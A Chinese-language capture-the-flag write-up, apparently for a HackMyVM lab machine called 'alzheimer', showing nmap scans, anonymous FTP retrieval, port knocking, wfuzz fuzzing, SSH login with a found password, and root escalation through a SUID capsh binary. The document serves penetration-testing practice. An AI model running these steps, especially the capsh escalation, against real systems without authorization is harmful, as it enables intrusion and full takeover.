渗透学习

1.扫描网段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[/home/ace]
└─# nmap -sP 192.168.56.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST
Nmap scan report for 192.168.56.1
Host is up (0.00033s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00019s latency).
MAC Address: 08:00:27:F1:8F:2D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.128
Host is up (0.0021s latency).
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds

2.扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.128 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST
Nmap scan report for 192.168.56.128
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.127
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

3.由上述结果可知,ftp连接使用anonymous空密码登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[/home/ace]
└─# ftp 192.168.56.128
Connected to 192.168.56.128.
220 (vsFTPd 3.0.3)
Name (192.168.56.128:ace): Anonymous    
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||31145|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        113          4096 Oct 03  2020 .
drwxr-xr-x    2 0        113          4096 Oct 03  2020 ..
-rw-r--r--    1 0        0              70 Oct 03  2020 .secretnote.txt
226 Directory send OK.
ftp> get .secretnote.txt
local: .secretnote.txt remote: .secretnote.txt
229 Entering Extended Passive Mode (|||22343|)
150 Opening BINARY mode data connection for .secretnote.txt (70 bytes).
100% |*****************************************************************************************************|    70       33.75 KiB/s    00:00 ETA
226 Transfer complete.
70 bytes received in 00:00 (18.70 KiB/s)
ftp>

4.查看文件

image-20230723175853705

说明要使用knockd工具打开端口

1
2
3
4
5
┌──(root㉿kali)-[/home/ace]
└─# knock 192.168.56.128 1000:tcp 2000:tcp 3000:tcp -v
hitting tcp 192.168.56.128:1000
hitting tcp 192.168.56.128:2000
hitting tcp 192.168.56.128:3000

再度扫描端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.128                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 17:35 CST
Nmap scan report for 192.168.56.128
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.127
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b13b2b36e56bd72a6defbfda0a5d2d43 (RSA)
|   256 35f170aba366f1d6d72cf7d1247a5f2b (ECDSA)
|_  256 be15fab681d67fabc81c97a5ea11854e (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds

80端口开放了 ,即网页可进行访问了

1
2
3
4
5
6
7
┌──(root㉿kali)-[/home/ace]
└─# curl -l 192.168.56.128
I dont remember where I stored my password :(
I only remember that was into a .txt file...
-medusa

<!---. --- - .... .. -. --. -->

5.wfuzz扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root㉿kali)-[/home/ace]
└─# wfuzz -c --hc=404 -t200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://192.168.56.128/FUZZ.txt 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.128/FUZZ.txt
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                          
=====================================================================

000000001:   200        5 L      27 W       132 Ch      "# directory-list-2.3-medium.txt"                                                
000000007:   200        5 L      27 W       132 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                
000000003:   200        5 L      27 W       132 Ch      "# Copyright 2007 James Fisher"                                                  
000000004:   200        5 L      27 W       132 Ch      "#"                                                                              
000000002:   200        5 L      27 W       132 Ch      "#"                                                                              
000000005:   200        5 L      27 W       132 Ch      "# This work is licensed under the Creative Commons"                             
000000008:   200        5 L      27 W       132 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                     
000000006:   200        5 L      27 W       132 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                  
000000009:   200        5 L      27 W       132 Ch      "# Suite 300, San Francisco, California, 94105, USA."                            
000000010:   200        5 L      27 W       132 Ch      "#"                                                                              
000000011:   200        5 L      27 W       132 Ch      "# Priority ordered case-sensitive list, where entries were found"               
000000012:   200        5 L      27 W       132 Ch      "# on at least 2 different hosts"                                                
000000013:   200        5 L      27 W       132 Ch      "#"                                                                              
Total time: 0
Processed Requests: 220560
Filtered Requests: 220547
Requests/sec.: 0

6.尝试登录ssh

密码:Ihavebeenalwayshere!!!

登陆成功:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[/home/ace]
└─# ssh medusa@192.168.56.128                                                                                                      
The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
ED25519 key fingerprint is SHA256:O2S8HAtlJxSTJJgIQUiIzsbSKX/qj9Thyn38JM6wsBY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
medusa@192.168.56.128's password: 
Linux alzheimer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct  3 06:00:36 2020 from 192.168.1.58
medusa@alzheimer:~$

7.提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
medusa@alzheimer:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh

发现:

image-20230723180449391

1
2
medusa@alzheimer:~$ /usr/sbin/capsh --gid=0 --uid=0 --
root@alzheimer:~# 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@alzheimer:~# cd root
bash: cd: root: No such file or directory
root@alzheimer:~# cd ..
root@alzheimer:/home# cd .
root@alzheimer:/home# cd ..
root@alzheimer:/# ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
root@alzheimer:/# cd root
root@alzheimer:/root# ls
root.txt
root@alzheimer:/root# cat root.txt 
HMVlovememories
root@alzheimer:/root#